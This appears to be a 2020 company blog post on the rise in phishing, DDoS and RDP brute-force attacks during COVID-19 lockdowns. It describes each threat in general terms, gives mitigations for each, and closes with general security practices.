During this unprecedented period when much of the world’s population is affected by lockdown measures and limited activities, cyber criminals have intensified their attacks. The state of fear and uncertainty has provided them with a new “business opportunity” and whilst most of us are spending more time on the Internet than ever before, several types of cyber-attacks have seen a drastic increase over the last few months.

1. Phishing Attacks

Amid this chaotic situation, many people are seeking out COVID-19 related information online, hoping to find reliable guidelines to stay safe and well. At the same time, hackers are taking advantage of this by ramping up “phishing” attacks that trick internet users into opening malicious files or links that report to provide COVID-19 information.

Cyber criminals do this by impersonating trusted organisations and sending out convincing emails containing attachments that are laden with malicious payloads. On opening, the attachments execute the code and allow an attacker unauthorised access to system resources and data, along with the capability to execute further attacks on other networked devices or resources.

In other phishing attacks, unsuspecting users are tricked into following links that lead the user to realistic login pages for trusted brands. On logging in, the valid usernames and passwords are captured and later used by criminals to conduct financial fraud and impersonation. 

Phishing attacks can be mitigated in several ways:

  • Implement anti-spoofing policy with malware and spam filters on mail servers to keep malicious emails from employees.
  • Implement email security protection measures such as SPF, DKIM and DMARC. This increases assurance around the validity of the sender associated with a particular domain and verifies whether it has been impersonated and prevents the emails from reaching inboxes.
  • Training employees on how to identify phishing exploits and the actions to take when they suspect phishing or have already opened an attachment or followed a link.

2. Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attack

At a time when Internet connections are required more than ever, a successful Denial of Service attack will have a more damaging impact than ever before.

A Distributed Denial-of-Service (DDoS) attack is when a collection of computers are infected with malicious code and controlled as a group (botnet). They are then targeted on another Internet service such as a web site, which is flooded with Internet traffic to deny its service to legitimate users. The outcome of a DDoS attack is operational disruption, which is achieved when systems and services are taken offline. Furthermore, attackers can disrupt organisations by threatening to shut down business services unless large sums of money are paid.

  • Utilising a Web Application Firewall (WAF)
  • Implementing rate limiting

It is crucial that organisations understand Denial of Service attacks and always be prepared to defend against it.

3. Remote Desktop Server Attack

Recently, many organisations have turned to Microsoft’s Remote Desktop Protocol (RDP) as a method of allowing remote workers access to corporate resources. The sharp increase in corporate services that need to be remotely accessible has significantly increased and with it the requirement to support remote working, however so has the number of reported RDP attacks.

RDP is a simple and cost-efficient method of facilitating remote working and access to corporate resources such as applications or desktops. However, the protocol is not sufficiently secure to be exposed to the internet. Without adequate security configurations in place, it can be easily compromised allowing an external attacker to gain a foothold into internal networks.

RDP attacks typically involve brute-forcing usernames and passwords, attempting all possible combinations until the correct one is found. Upon discovery of a correct combination, an attacker can gain full desktop access to a computer in the target network.

If your organisation must enable RDP, it is crucial that the following protection measures are in place:

  • Unique, long and random passwords are in use to protect the systems
  • Two factor authentication
  • Limiting the use of RDP to devices using a Corporate VPN
  • Ensure security options such as Network Level Authentication are enabled
  • Avoid connectivity of the RDP service to a corporate domain

If RDP access is not required, then it should be disabled and access to port 3389 should be blocked at the firewall.

Conclusion

In conclusion, cyber-crime is bound to increase for the rest of 2020 as cyber criminals are constantly engineering new methods to attack business operations. Hence, it is crucial that businesses stay ahead of cyber threats by maintaining good security practices, such as:

  • Regularly review network security – Audit security controls in place to ensure that network perimeters are well protected and unnecessary access are removed. Continue to monitor all systems and networks for unusual activities.
  • Maintain user education and awareness – Constantly remind employees of the importance of both physical and cyber security awareness. Develop home working policies and train employees to adhere to it.
  • Ensure Malware prevention is in place – Ensure that all anti-virus solutions are updated daily and anti-malware policies are in place.
  • Maintain secure configuration on all systems – Make sure that all servers and end user devices are patched up to date. Ensure that all remote working devices are subject to integrity checks before they are allowed access into corporate networks.
  • Secure remote access configurations – All remote solutions should utilise secure authentication, encryption technologies and have multifactor authentication enforced where possible.
  • Monitor user activities and privileges – Continue to monitor user activities for potential malicious activities and ensure that principle of least privilege is actively applied.
  • Incident response plan – Always be alert and prepared for potential cyber-attacks, ensure that an incident response plan is in place to deal with any emergencies.